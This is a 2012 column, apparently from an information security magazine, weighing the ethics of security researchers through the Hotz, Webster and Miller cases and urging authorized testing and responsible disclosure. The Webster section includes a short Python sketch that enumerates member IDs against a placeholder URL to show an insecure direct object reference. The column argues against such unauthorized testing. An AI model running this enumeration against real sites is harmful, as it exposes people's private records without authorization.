Can a computer security researcher go too far?


Centuries of literary works and real-life scenarios have depicted the battle of good versus evil: God versus Satan; Hamlet vs. Claudius; Darth Vader vs. Luke; Cubs vs. Sox; NBA players vs. NBA owners. In the security community, it's the Security Researcher vs. the Corporation. The reality is that in most of these scenarios, the characters are simply flawed or have differing agendas; neither side is truly good or evil.

I have been following the security community for 15 years and I have seen the good, the bad and the ugly associated with researchers releasing their findings and the corporate responses.  It is a point of constant conflict in the industry.

A few cases have led me to question whether computer security researchers can go too far and whether the companies they research really are the bad guys: George "GeoHot" Hotz "mod'ing" the Sony PlayStation console; Patrick Webster vs. First State Superannuation in Australia; and Charlie Miller vs. Apple.

In each case, I draw an analogy to buying a riding lawn mower. I fully expect that if I buy a riding lawn mower, I am within my rights as owner of the product to "mod" (modify) it to the point where I can race it and win. Provided I do not harm others who buy or use the same product, and I use the product within the law, this is my right as owner. I also fully expect that if I buy a riding lawn mower, it will not have a series of conditions created during the manufacturing process, unbeknownst to the manufacturer and outside its typical QA process, that will cause me to inadvertently drive it through my picture window. Finally, I do not expect someone to sneak into the store where my mower is sold, soup it up without my knowledge, and wait until I drive it through my picture window in the spirit of proving it can be done.

In the case of George Hotz and Sony, I believe consumers are well within their rights to "mod" any product they purchase for whatever reason they see fit. This is what you pay for: you own the product. This is not a case of stealing the code and reselling it, but of retrofitting it for your needs.

In the case of Patrick Webster and First State Superannuation (FSS), I am obligated to point out the concept of "authorized testing." Webster was not authorized to conduct a vulnerability test against this website, but in the spirit of research he conducted testing anyway and (inadvertently?) downloaded personally identifiable information (PII). According to The Sydney Morning Herald, he wrote a "...script that cycled through each ID number and pulled down the relevant report to his computer."
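
To make "cycled through each ID number" concrete, the following is a minimal Python sketch of that style of enumeration. The URL, parameter name and ID values are hypothetical placeholders, not details of the actual FSS site; the point is simply that changing one numeric identifier in a request was enough to retrieve another member's statement, a classic insecure direct object reference. Note, too, that a researcher could stop after confirming a single ID; it is the bulk download that turns a proof of concept into a breach.

    import requests  # third-party HTTP library

    # Hypothetical endpoint and parameter name -- NOT the real FSS site.
    BASE_URL = "https://statements.example.com/report"

    def statement_exposed(member_id):
        """Request the statement for one member ID and report whether it comes back
        without any authorization check."""
        resp = requests.get(BASE_URL, params={"memberId": member_id}, timeout=10)
        return resp.status_code == 200 and len(resp.content) > 0

    # Webster's script reportedly looped over the full ID range and saved every report.
    # A less intrusive proof would stop after one or two confirmations:
    for member_id in (1001, 1002):  # hypothetical IDs
        if statement_exposed(member_id):
            print(f"ID {member_id}: report returned to an unauthorized requester")
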

In information security, unauthorized testing has always been a big no-no. How do we know Webster is altruistic and had no intention of using this PII for unlawful or unethical purposes? Because he said so, reported it in a responsible manner and was nice about it? FSS couldn't simply assume Webster was being responsible and trust him; doing so would have been irresponsible to its customers. FSS was obligated to determine the extent of the breach (yes, it was a breach) and address the repercussions. In this case, was it necessary for Webster to download the data to prove the flaw?

The case of Miller and Apple's App Store is a different story. According to a report in The Huffington Post, "He created a secret application that he believed could download malware onto iPhones and iPads, and got it approved for distribution in Apple's App Store." Thus, he circumvented the Apple QA process to prove the vulnerability could be exploited. The difficult part about this case is that Miller couldn't test and prove the flaw without circumventing the process. While his intentions were likely non-malicious, we can only assume this to be true based on trusting him personally. That defies a fundamental principle in information security: never trust the human element. How can we possibly change that rule for a security researcher?

Here are three simple points security researchers should keep in mind:

  1. Please do not expect users, society, or companies to trust you.  This defies a fundamental principle of information security.  Respect this principle and do not expect exceptions on the basis of research.
  2. Recognize there is a concept of authorized testing.  It is not okay to randomly test public sites that contain others’ private information in the spirit of research.  Users have rights and testing may infringe on those rights. Companies that disparage this behavior are not always wrong; they may simply be protecting their customers.
  3. Do not assume excessive lengths are necessary to prove a point.  Be patient and give companies the benefit of the doubt in accordance with the many responsible disclosure policies publicly available.  If the company has not responded after the typical six- to eight-week window, then please refrain from downloading all of the data; run a few individual exploits, disclose the vulnerability to an organization such as CERT and let it facilitate the process.

At the end of the day, I do not believe either researchers or the companies they research are good or evil. Both have differing agendas and are serving the interests of those they support.  We all need to respect each other’s place in society and understand we may not agree on all topics. There is no such thing as good and evil, only flawed characters who are doing their best.

About the author:
Elizabeth Martin has 15 years of experience in the information security, compliance, and risk management industry.  She has extensive experience in the automotive, retail, financial, healthcare, government, and managed security services verticals. Send comments on this column to feedback@infosecuritymag.com.

This was first published in February 2012
